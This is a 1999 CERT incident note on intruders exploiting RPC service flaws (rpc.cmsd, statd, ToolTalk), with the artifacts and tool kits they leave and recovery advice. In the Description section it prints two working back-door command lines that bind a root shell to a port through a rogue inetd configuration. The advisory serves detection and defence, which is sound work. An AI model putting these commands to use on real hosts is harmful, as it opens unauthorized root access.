The CERT Coordination Center publishes incident notes to provide
information about incidents to the Internet community.
<h2>Similar Attacks Using Various RPC Services</h2>
Updated: December 9, 1999 (added information about IN-99-07)<br/>
Updated: October 15, 1999 (added information about statd exploit)<br/>
Thursday, July 22, 1999
<h3>Overview</h3>
We have received reports that intruders are using similar methods to
compromise systems. We have seen intruders exploit three different RPC
service vulnerabilities; however, similar artifacts have been found on
compromised systems.
<p>
Vulnerabilities we have seen exploited as a part of these attacks
include:
<ul>
<li>CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd<p>
<a href="http://www.cert.org/advisories/CA-99-08-cmsd.html">
http://www.cert.org/advisories/CA-99-08-cmsd.html</a><p>
<li>CA-99-05 - Vulnerability in statd exposes vulnerability in automountd<p>
<a href="http://www.cert.org/advisories/CA-99-05-statd-automountd.html">
http://www.cert.org/advisories/CA-99-05-statd-automountd.html</a><p>
<li>CA-98.11 - Vulnerability in ToolTalk RPC Service<p>
<a href="http://www.cert.org/advisories/CA-98.11.tooltalk.html">
http://www.cert.org/advisories/CA-98.11.tooltalk.html</a><p>
</p></p></li></p></p></li></p></p></li></ul>
<h3>Description</h3>
Reports involving these vulnerabilities have involved very similar
intruder activity. The level of activity and the scope of the
incidents suggests that intruders are using scripts to automate
attacks. These attacks appear to attempt multiple exploitations but
produce similar results. We have received reports of the following
types of activity associated with these attacks:
<p>
<ul>
<li>Core files for rpc.ttdbserverd located in the root "/" directory,
left by an exploitation attempt against rpc.ttdbserverd<p>
<li>Files named <b>callog.*</b> located in the cmsd spool directory, left
by an exploitation attempt against rpc.cmsd<p>
<li>Exploitations that execute similar commands to create a privileged
back door into a compromised host. Typically, a second instance of
the inetd daemon is started using an intruder-supplied configuration
file. The configuration file commonly contains an entry that
provides the intruder a privileged back door into the compromised
host. The most common example we have seen looks like this:
<p>
<pre>
/bin/sh -c echo 'ingreslock stream tcp wait root /bin/sh -i' >>
/tmp/bob;/usr/sbin/inetd -s /tmp/bob
</pre>
If successfully installed and executed, this back door may be used
by an intruder to gain privileged (e.g., root) access to a
compromised host by connecting to the port associated with the
<b>ingreslock</b> service, which is typically TCP port 1524. The
file names and service names are arbitrary; they may be changed to
create an inetd configuration file in a different location or a
back door on a different port.
<p>
The /tmp/bob directory has also been evident in exploits against
the statd vulnerability. The most common example we have seen for
statd looks like this:
<p>
<pre>
/var/statmon/sm/; echo "pcserver stream tcp nowait root /bin/sh sh -i" >>
/tmp/bob ; /usr/sbin/inetd -s /tmp/bob
</pre>
<p>
<li>In many cases, scripts have been used to automate intruder
exploitation of back doors installed on compromised hosts. This
method has been used to install and execute various intruder tools
and tool archives, initiate attacks on other hosts, and collect
output from intruder tools such as packet sniffers.
<p>
One common set of intruder tools we have seen is included in an
archive file called <b>neet.tar</b>, which includes several
intruder tools:<p>
<ul>
<li>A packet sniffer named <b>update</b> or <b>update.hme</b> that
produces an output file named <b>output</b> or <b>output.hme</b><p>
<li>A back door program named <b>doc</b> that is installed as a
replacement to /usr/sbin/inetd. The back door is activated when
a connection is received from a particular source port and a special
string is provided. We have seen the source port of 53982 commonly
used.<p>
<li>A replacement <b>ps</b> program to hide intruder processes. We have
seen a configuration file installed at /tmp/ps_data on compromised
hosts.<p>
</p></li></p></li></p></li></ul>
<p>
Another common set of intruder tools we have seen is included in an
archive file called <b>leaf.tar</b>, which includes serveral intruder
tools:<p>
<ul>
<li>A replacement <b>in.fingerd</b> program with a back door for
intruder access to the compromised host<p>
<li><b>eggdrop</b>, an IRC tool commonly installed on compromised
hosts by intruders. In this activity, we've seen the binary
installed as /usr/sbin/nfds<p>
<li>Various files and scripts associated with eggdrop, many of which
are installed in the directory <b>/usr/lib/rel.so.1</b><p>
<li>A replacement root crontab entry used to start eggdrop
</li></p></li></p></li></p></li></ul>
<p>
It is possible that other tools and tool archives could be
involved in similar activity.
<p>
<li>Installation of distributed denial of service tools. For more
information, see
<p>
<dl>
<dd><a href="http://www.cert.org/incident_notes/IN-99-07.html">
IN-99-07</a>, Distributed Denial of Service Tools
</dd></dl>
<p>
<li>In some cases, we have seen intruder scripts remove or destroy
system binaries and configuration files.
</li></p></p></li></p></p></p></p></p></p></li></p></p></p></p></li></p></li></p></li></ul>
<h3>Solutions</h3>
If you believe a host has been compromised, we encourage you to
disconnect the host from the network and review our steps for
recovering from a root compromise:
<p>
<dl>
<dd><a href="http://www.cert.org/tech_tips/root_compromise.html">
http://www.cert.org/tech_tips/root_compromise.html</a>
</dd></dl>
<p>
In many cases intruders have installed packet sniffers on compromised
hosts and have used scripts to automate collection of the output
logs. It may be the case that usernames and passwords used in network
transactions with a compromised host, or on the same network segment
as a compromised host, may have fallen into intruder hands and are no
longer secure. We encourage you to address password security issues
after any compromised hosts at your site have been secured.
<p>
You should also review the state of security on other hosts on your
network. If usernames and passwords have been compromised, an intruder
may be able to gain unauthorized access to other hosts on your
network. Also, an intruder may be able to use trust relationships
between hosts to gain unauthorized access from a compromised host. Our
intruder detection checklist can help you to evaluate a host's state
of security:
<p>
<dl>
<dd><a href="http://www.cert.org/tech_tips/intruder_detection_checklist.html">
http://www.cert.org/tech_tips/intruder_detection_checklist.html</a>
</dd></dl>
<p>
We encourage you to ensure that your hosts are current with security
patches or work-arounds for well-known vulnerabilities. In particular,
you may wish to review the following CERT advisories for suggested
solutions:
<p>
<ul>
<li>CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd<p>
<a href="http://www.cert.org/advisories/CA-99-08-cmsd.html">
http://www.cert.org/advisories/CA-99-08-cmsd.html</a><p>
<li>CA-99-05 - Vulnerability in statd exposes vulnerability in automountd<p>
<a href="http://www.cert.org/advisories/CA-99-05-statd-automountd.html">
http://www.cert.org/advisories/CA-99-05-statd-automountd.html</a><p>
<li>CA-98.11 - Vulnerability in ToolTalk RPC Service<p>
<a href="http://www.cert.org/advisories/CA-98.11.tooltalk.html">
http://www.cert.org/advisories/CA-98.11.tooltalk.html</a><p>
</p></p></li></p></p></li></p></p></li></ul>
<p>
We also encourage you to regularly review security related patches
released by your vendors.
<p>
<p><!--#include virtual="/include/footer_nocopyright.html" --> </p>
<p>Copyright 1999 Carnegie Mellon University.</p>
</p></p></p></p></p></p></p></p></p></p> |